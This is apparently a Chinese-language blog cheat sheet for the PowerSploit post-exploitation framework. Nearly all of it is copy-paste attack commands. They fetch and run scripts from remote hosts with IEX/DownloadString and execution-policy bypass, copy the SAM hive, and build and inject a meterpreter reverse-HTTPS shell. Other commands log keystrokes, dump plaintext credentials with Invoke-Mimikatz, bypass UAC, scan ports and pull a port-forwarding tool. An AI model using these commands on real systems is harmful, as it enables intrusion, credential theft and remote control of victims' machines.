PowerSploit

简介

内网渗透神器

基本使用过程

  1. 加载模块

    1
    2
    3
    4
    5
    # 远程加载
    IEX(new-object net.webclient).downloadstring("http://xxllxxxx")

    # 本地加载
    import-module xxllxxx

  2. 使用模块
    eg:

    1
    Invoke-NinjaCopy.ps1 -path C:\Windows\System32\config\SAM -LocalDestination C:\SAM

使用实例

域信息收集

1
2
3
4
5
6
7
8
9
10
# 远程加载PowerView模块并查询net user
powershell.exe -Exec bypass "IEX(New-Object Net.WebClient).DownloadString('http://111.230.170.95/PowerSploit/Recon/PowerView.ps1');Get-NetUser"

# 本地加载并使用
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Invoke-U"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Invoke-P"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Get-IPAddress"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Get-NetDomain"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Get-NetUser"
powershell.exe -Exec bypass -Command "Import-module .\PowerView.ps1;Get-NetUser"

反弹shell(metepreter)

  1. 调用msfvenom生成一个反弹木马,以供invoke-shellcode注入,同样生成的反弹马放入web中

    1
    msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.158.133 LPORT=4444 -f powershell -o /var/www/html/code

  2. powershell通过IEX下载调用invoke-shellcode及生成的反弹木马

    1
    IEX(New-Object Net.Webclient).DownloadString("http://192.168.158.133/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")

  3. metasploit设置监听(Payload、LHOST、LPORT)

    1
    2
    3
    4
    5
    use exploit/multi/handler
    set Payload windows/x64/meterpreter_reverse_https
    set LHOST 192.168.158.133
    set LPORT 4444
    exploit
  1. 将shellcode注入到本地的Powershell
    powershell中调用invoke-shellcode
    1
    Invoke-Shellcode -Shellcode $buf -Force
  1. 将shellcode注入到指定进程
    powershell中查看指定进程如:notepad
    1
    ps -Name notepad

注入指定进程

1
Invoke-Shellcode -Shellcode $buf -ProcessID 2286 -Force

还可调用Invoke-dllinjection模块,将DLL文件注入到进程

端口扫描

调用invoke-Portscan扫描内网主机的端口

1
2
3
4
5
C:\Windows\system32> IEX(New-Object net.webclient).DownloadString("http://192.168.158.133/PowerSploit/Recon/Invoke-Po
rtscan.ps1")

Invoke-Portscan -Hosts 192.168.174.200 -Ports "20-25"
Invoke-Portscan -Hosts 192.168.174.200 -Ports "21,22,23,80,1433,3306,3389,8080"

一句话网段端口存活探测

1
powershell.exe -Exec bypass "IEX(New-Object net.webclient).downloadstring('http://192.168.5.10/upload/xxllxx/PowerSploit/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 10.1.1.128/25 -Ports '20,21,22,23,25,53,80,123,134,135,161,162,8161,389,443,445,513,873,1433,1080,1521,1900,2049,2601,2082,3128,2604,2083,3312,3306,4899,4440,8834,4848,3312,3389,4440,5672,5900,6082,6379,7001,8000,8080,8089,8161,8649,9000,9090,9300,9999,10050,11211,28017,3777,27017,50000,50060,50070'"

键盘记录

Exfiltrations模块
调用Get-Keystrokes记录用户的键盘输入

1
2
3
IEX(New-Object net.webclient).DownloadString("http://192.168.158.133/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

Get-Keystrokes -LogPath C:\Users\xxllxx\Desktop\hack\Keystrokes.txt

抓取内存中的明文密码

Invoke-Mimikatz模块
通过IEX下载并调用Invoke-Mimikatz

1
2
3
IEX(New-Object net.webclient).downloadstring("http://192.168.158.133/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

Invoke-Mimikatz -DumpCreds

一句话版

1
powershell.exe -Exec bypass "IEX(New-Object net.webclient).downloadstring('http://192.168.5.10/upload/xxllxx/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

用户访问控制绕过

Bypass UAC
当UAC为默认等级及以下时:
Powershell suite

1
powershell.exe -exec bypass "import-module .\Bypass-UAC.ps1;Bypass-UAC"

1
2
3
4
5
# win 7 Pro
![UacMethodSysprep]

# win 10 pro
![UacMethodTcmsetup]

Powershell文件远程下载

  • windows 7

    1
    powershell.exe -Exec bypass "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.5.10/upload/xxllxx/LCX-master/Lcx.exe','.\lcx.exe')"

  • windows 8 及以上

    1
    powershell.exe "wget 'http://192.168.5.10/upload/xxllxx/LCX-master/Lcx.exe' -outfile '.\lcx.exe'"

您的支持是我前进的动力!